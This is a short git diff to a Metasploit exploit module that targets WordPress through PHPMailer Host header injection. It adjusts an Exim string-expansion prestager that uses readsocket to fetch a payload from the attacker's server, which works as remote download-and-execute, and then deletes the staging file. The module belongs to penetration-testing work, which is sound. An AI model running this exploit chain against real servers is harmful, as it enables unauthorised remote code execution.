diff --git a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
index ee428b9ec6..a811320d2b 100644
--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # This is basically sh -c `wget` implemented using Exim string expansions
     prestager << '/bin/sh -c ${extract{-1}{${run{/bin/echo}}}{${readsocket{' \
                  "inet:#{srvhost_addr}:#{srvport}}{get #{get_resource} "\
-                 'http/1.0${run{/bin/echo}}${run{/bin/echo}}}}}}'
+                 'http/1.0${extract{0}{${run{/bin/echo}}}{$value$value}}}}}}'
     # CmdStager should rm the file, but it blocks on the payload, so we do it
     prestager << "/bin/rm -f #{cmdstager_path}"
   end